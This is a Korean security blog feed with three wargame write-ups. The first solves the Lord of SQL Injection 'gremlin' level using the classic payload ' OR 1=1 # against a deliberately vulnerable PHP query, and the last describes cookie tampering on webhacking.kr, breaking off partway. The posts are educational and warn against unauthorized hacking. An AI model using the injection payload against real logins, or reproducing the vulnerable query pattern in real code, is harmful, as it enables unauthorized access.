&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;851&quot; data-origin-height=&quot;297&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/boMkQr/btrUMI4KK6p/p0lBOZnVHJOCqa53zRAwC1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/boMkQr/btrUMI4KK6p/p0lBOZnVHJOCqa53zRAwC1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/boMkQr/btrUMI4KK6p/p0lBOZnVHJOCqa53zRAwC1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FboMkQr%2FbtrUMI4KK6p%2Fp0lBOZnVHJOCqa53zRAwC1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;262&quot; data-origin-width=&quot;851&quot; data-origin-height=&quot;297&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php&lt;span style=&quot;color: #ee2323;&quot;&gt;?id=admin&amp;amp;pw=admin&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;처음 문제에 접속을 하여 query 부분을 확인하면 id와 pw 부분이 비어 있지만, &lt;span style=&quot;color: #333333;&quot;&gt;id와 pw의 값을 넘겨주면 쿼리 문이&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;select id from prob_gremlin where id='admin' and pw='admin' 변경된 것을 알 수 있습니다. 즉 id=admin이고 pw=admin 인 값을 prob_gremlin 테이블의 id 컬럼에서 select해라라는 뜻이 됩니다. 코드를 살펴보도록 하겠습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-1078460042237685&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;pre id=&quot;code_1672128932776&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit(&quot;No Hack ~_~&quot;); // do not try to attack another table, database!
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit(&quot;No Hack ~_~&quot;);&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match() 함수&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;인자로 전달받은 정규 표현식과 일치하는 패턴을 검색하는 php의 함수입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match(string&amp;nbsp;$pattern,&amp;nbsp;string&amp;nbsp;$subject,&amp;nbsp;array&amp;nbsp;&amp;amp;$matches&amp;nbsp;=&amp;nbsp;null,&amp;nbsp;int&amp;nbsp;$flags&amp;nbsp;=&amp;nbsp;0,&amp;nbsp;int&amp;nbsp;$offset&amp;nbsp;=&amp;nbsp;0):&amp;nbsp;int|false&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;pattern - 정규 표현식의&lt;span&gt;&amp;nbsp;&lt;/span&gt;검색할&amp;nbsp;패턴(문자열)입니다.&lt;br /&gt;subject -&lt;span&gt;&amp;nbsp;&lt;/span&gt;입력&amp;nbsp;문자열입니다.&lt;br /&gt;matches -&lt;span&gt;&amp;nbsp;제공&amp;nbsp;되면&lt;/span&gt;&amp;nbsp;matches검색&amp;nbsp;결과로&amp;nbsp;채워집니다.&amp;nbsp;$matches [0]&amp;nbsp;에는&amp;nbsp;전체&amp;nbsp;패턴과&amp;nbsp;일치하는&amp;nbsp;텍스트가&amp;nbsp;포함되고,&amp;nbsp;$matches [1]&amp;nbsp;에는&amp;nbsp;캡처된&amp;nbsp;첫&amp;nbsp;번째&amp;nbsp;괄호&amp;nbsp;하위&amp;nbsp;패턴과&amp;nbsp;일치하는&amp;nbsp;텍스트가&amp;nbsp;포함되는&amp;nbsp;식입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;정규 표현식에 대해서는 추후에 자세히 다루도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;id, pw 전달받은 값 중에 &lt;span style=&quot;color: #ee2323;&quot;&gt;prob&lt;/span&gt;, &lt;span style=&quot;color: #ee2323;&quot;&gt;_&lt;/span&gt; , &lt;span style=&quot;color: #ee2323;&quot;&gt;.&lt;/span&gt; , &lt;span style=&quot;color: #ee2323;&quot;&gt;(&lt;/span&gt; , &lt;span style=&quot;color: #ee2323;&quot;&gt;)&lt;/span&gt; 값이 존재할 경우 &quot;No Hack ~_~&quot;을 표시해라 라는 뜻입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;678&quot; data-origin-height=&quot;129&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cy0eNw/btrUKX2segu/BLABKeCn24dF2xvEceqXcK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cy0eNw/btrUKX2segu/BLABKeCn24dF2xvEceqXcK/img.png&quot; data-alt=&quot;id=prob 값 전달&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cy0eNw/btrUKX2segu/BLABKeCn24dF2xvEceqXcK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcy0eNw%2FbtrUKX2segu%2FBLABKeCn24dF2xvEceqXcK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;143&quot; data-origin-width=&quot;678&quot; data-origin-height=&quot;129&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;id=prob 값 전달&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;id에 prob 값을 전달하면 &quot;No Hack ~_~&quot; 이 표시되는 것을 확인할 수 있습니다. 위에서 정규 표현식으로 필터링하는 값들을 하나씩 넣어 보고 결과 값을 확인해 보시기를 추천드립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1672130684311&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;$query = &quot;select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'&quot;;
echo &quot;&amp;lt;hr&amp;gt;query : &amp;lt;strong&amp;gt;{$query}&amp;lt;/strong&amp;gt;&amp;lt;hr&amp;gt;&amp;lt;br&amp;gt;&quot;;
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve(&quot;gremlin&quot;);
highlight_file(__FILE__);&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;query - SQL 쿼리문을 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;echo - 값을 출력&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;mysqli_fetch_array 함수 - 쿼리의 결과를 처리&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;highlight_file&amp;nbsp;&amp;mdash;&amp;nbsp;파일의&amp;nbsp;구문&amp;nbsp;강조&amp;nbsp;표시&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;위의 쿼리를 살펴보면 id와 pw 값이 일치해야 문제가 풀리는 것을 알 수 있습니다. 하지만 우리는 id와 pw 값을 모르기 때문에 SQL 쿼리 문을 통해 우회를 해야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;959&quot; data-origin-height=&quot;379&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/6zb88/btrUGIZAd3X/9gUkeAX9zKpl67kO5OdLm1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/6zb88/btrUGIZAd3X/9gUkeAX9zKpl67kO5OdLm1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/6zb88/btrUGIZAd3X/9gUkeAX9zKpl67kO5OdLm1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F6zb88%2FbtrUGIZAd3X%2F9gUkeAX9zKpl67kO5OdLm1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;296&quot; data-origin-width=&quot;959&quot; data-origin-height=&quot;379&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;id=value&amp;amp;pw=%27%20OR%201=1%20%23&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;URL이 인코딩 되었지만 실제 값은 아래와 같습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;id=임의값 &amp;amp; pw=' OR 1=1 #&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pw=' OR 1=1 #&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select&amp;nbsp;id&amp;nbsp;from&amp;nbsp;prob_gremlin&amp;nbsp;where&amp;nbsp;id='value'&amp;nbsp;and&amp;nbsp;pw=''&amp;nbsp;OR&amp;nbsp;1=1&amp;nbsp;&lt;s&gt;#'&lt;/s&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select&amp;nbsp;id&amp;nbsp;from&amp;nbsp;prob_gremlin&amp;nbsp;where&amp;nbsp;id=''&amp;nbsp;and&amp;nbsp;pw=''&amp;nbsp;OR&amp;nbsp;1=1&amp;nbsp;&lt;s&gt;#'&lt;/s&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;쿼리를 해석해 보면 porb_gremlin 테이블의 id 컬럼에서 id가 value 이고 pw가 없거나 또는 값이 참일경우 조회해라 라고 풀이 할수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;SQL 쿼리 문을 통하여 값을 참으로 만들어 주면 prob_gremlin 테이블의 모든 id 값을 가져올 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참고&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://www.php.net/manual/en/function.preg-match.php&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.php.net/manual/en/function.preg-match.php&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://www.w3schools.com/tags/ref_urlencode.asp&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.w3schools.com/tags/ref_urlencode.asp&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::War Game/los.rubiya.kr</category>
      <category>gremlin</category>
      <category>Lord of SQLInjection</category>
      <category>Lord of the SQL Injection</category>
      <category>Los</category>
      <category>sql injection</category>
      <category>워게임</category>
      <category>웹 해킹</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/261</guid>
      <comments>https://securitycode.tistory.com/261#entry261comment</comments>
      <pubDate>Tue, 27 Dec 2022 18:04:00 +0900</pubDate>
    </item>
    <item>
      <title>[LOS] Lord of the SQL Injection 소개</title>
      <link>https://securitycode.tistory.com/260</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위입니다.&lt;/span&gt; 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;사이트 - &lt;a href=&quot;https://los.rubiya.kr/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://los.rubiya.kr/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1671433726134&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;Lord of SQLInjection&quot; data-og-description=&quot;&quot; data-og-host=&quot;los.rubiya.kr&quot; data-og-source-url=&quot;https://los.rubiya.kr/&quot; data-og-url=&quot;https://los.rubiya.kr/&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://los.rubiya.kr/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://los.rubiya.kr/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Lord of SQLInjection&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;los.rubiya.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;Lord of SQLInjection 사이트는 SQL Injection에 대하여 이해하고 기본적인 문법과 스킬을 습득하기에 좋은 사이트로 간단한 소개와 앞으로 문제풀이를 같이 해보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;580&quot; data-origin-height=&quot;386&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mh8qH/btrTZyQnjgV/sWVUBP6xnDMHfWViK1vAn0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mh8qH/btrTZyQnjgV/sWVUBP6xnDMHfWViK1vAn0/img.png&quot; data-alt=&quot;https://los.rubiya.kr/&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mh8qH/btrTZyQnjgV/sWVUBP6xnDMHfWViK1vAn0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fmh8qH%2FbtrTZyQnjgV%2FsWVUBP6xnDMHfWViK1vAn0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;580&quot; height=&quot;386&quot; data-origin-width=&quot;580&quot; data-origin-height=&quot;386&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://los.rubiya.kr/&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;먼저 사이트에 접속을 하면 위와 같은 화면을 확인할 수 있고, [enter to the dungeon]을 눌러 회원 가입을 해줍니다. 저 같은 경우 회원 가입을 할 때 평소 쓰지 않는 ID와 PW를 입력하여 회원 가입을 진행하였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;588&quot; data-origin-height=&quot;542&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cGT1U2/btrT4QoLmNK/6h82bbo41Rshaw9nlYmtAK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cGT1U2/btrT4QoLmNK/6h82bbo41Rshaw9nlYmtAK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cGT1U2/btrT4QoLmNK/6h82bbo41Rshaw9nlYmtAK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcGT1U2%2FbtrT4QoLmNK%2F6h82bbo41Rshaw9nlYmtAK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;588&quot; height=&quot;542&quot; data-origin-width=&quot;588&quot; data-origin-height=&quot;542&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;회원 가입 후 로그인을 해보면 위와 같이 다양한 문제들이 있는 것을 확인할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;851&quot; data-origin-height=&quot;293&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/SaRzx/btrT2RvcH0T/pURaKnUQkWcIHGeUG6yuPK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/SaRzx/btrT2RvcH0T/pURaKnUQkWcIHGeUG6yuPK/img.png&quot; data-alt=&quot;gremlin&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/SaRzx/btrT2RvcH0T/pURaKnUQkWcIHGeUG6yuPK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FSaRzx%2FbtrT2RvcH0T%2FpURaKnUQkWcIHGeUG6yuPK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;258&quot; data-origin-width=&quot;851&quot; data-origin-height=&quot;293&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;gremlin&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;gremlin 눌러 확인해 보면 SQL Injection 실습을 할 수 있도록 문제가 제공되는 것을 확인할 수 있습니다. 그럼 앞으로 gremlin부터 문제풀이는 진행해 보도록 하겠습니다.&lt;/p&gt;</description>
      <category>Code::War Game/los.rubiya.kr</category>
      <category>Lord of the SQLInjection</category>
      <category>Los</category>
      <category>sql injection</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/260</guid>
      <comments>https://securitycode.tistory.com/260#entry260comment</comments>
      <pubDate>Mon, 19 Dec 2022 16:21:43 +0900</pubDate>
    </item>
    <item>
      <title>[Wargame] Webhacking.kr old-01 문제</title>
      <link>https://securitycode.tistory.com/88</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: '맑은 고딕', sans-serif; font-size: 10pt;&quot;&gt;워게임 사이트 Webhacking.kr old-01 문제를 살펴보도록 하겠습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://webhacking.kr/chall.php&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://webhacking.kr/chall.php&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: '맑은 고딕', sans-serif; font-size: 10pt;&quot;&gt;사용되는툴 - EditThisCookie, 버프 스위트 (해당 부분 사용법들은 해당 블로그에 정리되어 있습니다.)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;378&quot; data-origin-height=&quot;252&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dyo12y/btrT4GGygHO/nCBKAZkT8jKc3DjeGkCq3K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dyo12y/btrT4GGygHO/nCBKAZkT8jKc3DjeGkCq3K/img.png&quot; data-alt=&quot;old-01&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dyo12y/btrT4GGygHO/nCBKAZkT8jKc3DjeGkCq3K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdyo12y%2FbtrT4GGygHO%2FnCBKAZkT8jKc3DjeGkCq3K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;378&quot; height=&quot;252&quot; data-origin-width=&quot;378&quot; data-origin-height=&quot;252&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;old-01&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: '맑은 고딕', sans-serif; font-size: 10pt;&quot;&gt;webhacking.kr의 old-01 문제 화면입니다. 처음 페이지를 보고 습관적으로 소스보기 및 해당 URL을 입력해 보았는데 별다른 특이사항이 없어 view-source 링크를 클릭하여 보았습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;501&quot; data-origin-height=&quot;428&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dtDbDL/btrTWMH82IY/fWWNgI8qdJDgilc3uyjEnK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dtDbDL/btrTWMH82IY/fWWNgI8qdJDgilc3uyjEnK/img.png&quot; data-alt=&quot;view-source&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dtDbDL/btrTWMH82IY/fWWNgI8qdJDgilc3uyjEnK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdtDbDL%2FbtrTWMH82IY%2FfWWNgI8qdJDgilc3uyjEnK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;501&quot; height=&quot;428&quot; data-origin-width=&quot;501&quot; data-origin-height=&quot;428&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;view-source&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: '맑은 고딕', sans-serif; font-size: 10pt;&quot;&gt;화면에 view-source 부분을 클릭하면 다음과 같은 소스코드들이 보입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: '맑은 고딕', sans-serif; font-size: 10pt;&quot;&gt;먼저 해당 소스코드를 살펴보도록 하겠습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #000000; font-family: '맑은 고딕', sans-serif; font-size: 10pt;&quot;&gt;소스코드를 살펴보면 user_lv 라는 쿠키를 생성하고 쿠키의 값에 1을 넣어주는 것을 알 수 있습니다.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #000000; font-family: '맑은 고딕', sans-serif; font-size: 10pt;&quot;&gt;라인을 따라서 코드를 확인해 보면 user_lv 값이 4보다 크거나 같을경우 user_lv 값을 1로 반환을 하고, user_lv 값이 3 이상일 경우 문제가 풀리는 것을 알 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: '맑은 고딕', sans-serif; font-size: 10pt;&quot;&gt;해당 문제는 간단히 쿠키를 변조하면 풀수 있는 문제로 EditThisCookie 툴을 이용하여 user_lv=값에 해당 조건을 만족하는 값을 입력 후 Set을 눌러 확인해 보도록 하겠습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
